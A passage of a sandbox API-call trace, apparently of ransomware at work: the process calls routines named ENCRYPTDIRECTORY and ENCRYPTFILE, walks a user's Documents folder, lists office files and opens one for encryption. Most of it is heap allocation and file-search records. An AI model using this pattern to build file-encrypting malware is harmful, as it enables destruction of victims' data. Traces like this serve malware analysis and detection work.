hHeap=0x1780000) returned 1 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0080.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0080.347] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0080.347] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0080.347] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e28a0, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x8, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3578, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="мńဓ+\x10")) returned 0 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0080.347] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0080.347] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0080.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0080.347] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0080.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0080.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0080.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0080.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0080.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|WZ9w", cchCount1=5, lpString2="", cchCount2=0) returned 3 [0080.348] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0080.348] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0080.348] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w")) returned 0x10 [0080.348] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\*", lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacbde450, ftCreationTime.dwHighDateTime=0x1d5ecfb, ftLastAccessTime.dwLowDateTime=0x3c566ca0, ftLastAccessTime.dwHighDateTime=0x1d5e139, ftLastWriteTime.dwLowDateTime=0x3c566ca0, ftLastWriteTime.dwHighDateTime=0x1d5e139, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43caef8, cFileName=".", cAlternateFileName="")) returned 0x41ac740 [0080.348] FindNextFileW (in: hFindFile=0x41ac740, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacbde450, ftCreationTime.dwHighDateTime=0x1d5ecfb, ftLastAccessTime.dwLowDateTime=0x3c566ca0, ftLastAccessTime.dwHighDateTime=0x1d5e139, ftLastWriteTime.dwLowDateTime=0x3c566ca0, ftLastWriteTime.dwHighDateTime=0x1d5e139, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43caef8, cFileName="..", cAlternateFileName="")) returned 1 [0080.349] FindNextFileW (in: hFindFile=0x41ac740, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5be40c0, ftCreationTime.dwHighDateTime=0x1d5eb3b, ftLastAccessTime.dwLowDateTime=0x20013d30, ftLastAccessTime.dwHighDateTime=0x1d5f036, ftLastWriteTime.dwLowDateTime=0x20013d30, ftLastWriteTime.dwHighDateTime=0x1d5f036, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43caef8, cFileName="-HpKoiMRyoVVCXApKjWd", cAlternateFileName="-HPKOI~1")) returned 1 [0080.349] FindNextFileW (in: hFindFile=0x41ac740, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c9167c0, ftCreationTime.dwHighDateTime=0x1d5ecfc, ftLastAccessTime.dwLowDateTime=0x9150bcd0, ftLastAccessTime.dwHighDateTime=0x1d5e821, ftLastWriteTime.dwLowDateTime=0x9150bcd0, ftLastWriteTime.dwHighDateTime=0x1d5e821, nFileSizeHigh=0x0, nFileSizeLow=0x6707, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="244Ql-yOIaa.pps", cAlternateFileName="244QL-~1.PPS")) returned 1 [0080.349] FindNextFileW (in: hFindFile=0x41ac740, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff39c120, ftCreationTime.dwHighDateTime=0x1d5e8d9, ftLastAccessTime.dwLowDateTime=0x8d8523a0, ftLastAccessTime.dwHighDateTime=0x1d5ebf7, ftLastWriteTime.dwLowDateTime=0x8d8523a0, ftLastWriteTime.dwHighDateTime=0x1d5ebf7, nFileSizeHigh=0x0, nFileSizeLow=0x276a, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="5R 2.rtf", cAlternateFileName="5R2~1.RTF")) returned 1 [0080.349] FindNextFileW (in: hFindFile=0x41ac740, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0a74e20, ftCreationTime.dwHighDateTime=0x1d5ecc1, ftLastAccessTime.dwLowDateTime=0xa975cc0, ftLastAccessTime.dwHighDateTime=0x1d5e9b2, ftLastWriteTime.dwLowDateTime=0xa975cc0, ftLastWriteTime.dwHighDateTime=0x1d5e9b2, nFileSizeHigh=0x0, nFileSizeLow=0x7f03, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="bbYe6GX.rtf", cAlternateFileName="")) returned 1 [0080.349] FindNextFileW (in: hFindFile=0x41ac740, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d2cd410, ftCreationTime.dwHighDateTime=0x1d5e302, ftLastAccessTime.dwLowDateTime=0xba9d2b40, ftLastAccessTime.dwHighDateTime=0x1d5f114, ftLastWriteTime.dwLowDateTime=0xba9d2b40, ftLastWriteTime.dwHighDateTime=0x1d5f114, nFileSizeHigh=0x0, nFileSizeLow=0xa39c, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="E_f7p3czO1Cdd9o.xls", cAlternateFileName="E_F7P3~1.XLS")) returned 1 [0080.349] FindNextFileW (in: hFindFile=0x41ac740, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7888de10, ftCreationTime.dwHighDateTime=0x1d5e9d1, ftLastAccessTime.dwLowDateTime=0xfccc9c0, ftLastAccessTime.dwHighDateTime=0x1d5ec6c, ftLastWriteTime.dwLowDateTime=0xfccc9c0, ftLastWriteTime.dwHighDateTime=0x1d5ec6c, nFileSizeHigh=0x0, nFileSizeLow=0x17655, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="HGH4Uw7jgwUTEi7Vo_.ppt", cAlternateFileName="HGH4UW~1.PPT")) returned 1 [0080.349] FindNextFileW (in: hFindFile=0x41ac740, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6080750, ftCreationTime.dwHighDateTime=0x1d5ed25, ftLastAccessTime.dwLowDateTime=0x6f5c28c0, ftLastAccessTime.dwHighDateTime=0x1d5ec05, ftLastWriteTime.dwLowDateTime=0x6f5c28c0, ftLastWriteTime.dwHighDateTime=0x1d5ec05, nFileSizeHigh=0x0, nFileSizeLow=0x16ee0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="hhInqxZ8uBmIDhBj07.csv", cAlternateFileName="HHINQX~1.CSV")) returned 1 [0080.349] FindNextFileW (in: hFindFile=0x41ac740, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf795b670, ftCreationTime.dwHighDateTime=0x1d5ecb4, ftLastAccessTime.dwLowDateTime=0xe75f1d20, ftLastAccessTime.dwHighDateTime=0x1d5f05e, ftLastWriteTime.dwLowDateTime=0xe75f1d20, ftLastWriteTime.dwHighDateTime=0x1d5f05e, nFileSizeHigh=0x0, nFileSizeLow=0x6285, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="lWEK-JelBvY6EHJ.xlsx", cAlternateFileName="LWEK-J~1.XLS")) returned 1 [0080.349] FindNextFileW (in: hFindFile=0x41ac740, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7e98cd0, ftCreationTime.dwHighDateTime=0x1d5e5de, ftLastAccessTime.dwLowDateTime=0xc53e63e0, ftLastAccessTime.dwHighDateTime=0x1d5e7a8, ftLastWriteTime.dwLowDateTime=0xc53e63e0, ftLastWriteTime.dwHighDateTime=0x1d5e7a8, nFileSizeHigh=0x0, nFileSizeLow=0xadba, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="rar_tJIXYd14cWJz.odp", cAlternateFileName="RAR_TJ~1.ODP")) returned 1 [0080.349] FindNextFileW (in: hFindFile=0x41ac740, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23232a20, ftCreationTime.dwHighDateTime=0x1d5e463, ftLastAccessTime.dwLowDateTime=0xee16ecf0, ftLastAccessTime.dwHighDateTime=0x1d5ee4d, ftLastWriteTime.dwLowDateTime=0xee16ecf0, ftLastWriteTime.dwHighDateTime=0x1d5ee4d, nFileSizeHigh=0x0, nFileSizeLow=0x873a, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="Zjnf2x96GL5i.rtf", cAlternateFileName="ZJNF2X~1.RTF")) returned 1 [0080.349] FindNextFileW (in: hFindFile=0x41ac740, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2830, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x3, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c357c, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="ﹸмńဓ+\x10")) returned 0 [0080.349] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0080.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|244Ql-yOIaa.pps|5R 2.rtf|bbYe6GX.rtf|E_f7p3czO1Cdd9o.xls|HGH4Uw7jgwUTEi7Vo_.ppt|hhInqxZ8uBmIDhBj07.csv|lWEK-JelBvY6EHJ.xlsx|rar_tJIXYd14cWJz.odp|Zjnf2x96GL5i.rtf", cchCount1=162, lpString2="", cchCount2=0) returned 3 [0080.349] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0080.350] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\244Ql-yOIaa.pps", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c9167c0, ftCreationTime.dwHighDateTime=0x1d5ecfc, ftLastAccessTime.dwLowDateTime=0x9150bcd0, ftLastAccessTime.dwHighDateTime=0x1d5e821, ftLastWriteTime.dwLowDateTime=0x9150bcd0, ftLastWriteTime.dwHighDateTime=0x1d5e821, nFileSizeHigh=0x0, nFileSizeLow=0x6707, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="244Ql-yOIaa.pps", cAlternateFileName="244QL-~1.PPS")) returned 0x41ac440 [0080.350] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0080.350] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0080.350] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0080.350] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0080.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cb318, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0080.350] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\244Ql-yOIaa.pps" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\244ql-yoiaa.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0080.350] FreeLibrary (hLibModule=0x772d0000) returned 1 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0080.351] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0080.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0080.351] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0080.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0080.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0080.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0080.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0080.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0080.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0080.352] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0080.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0080.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0080.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0080.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0080.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0080.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0080.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.353] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0080.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0080.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0080.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadc0 [0080.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43cadc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0080.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0080.353] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0080.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0080.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0080.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0080.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0080.353] CloseHandle (hObject=0x258) returned 1 [0080.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0080.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0080.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0080.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0080.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0080.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0080.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0080.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0080.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0080.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0080.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0080.354] FreeLibrary (hLibModule=0x772d0000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: 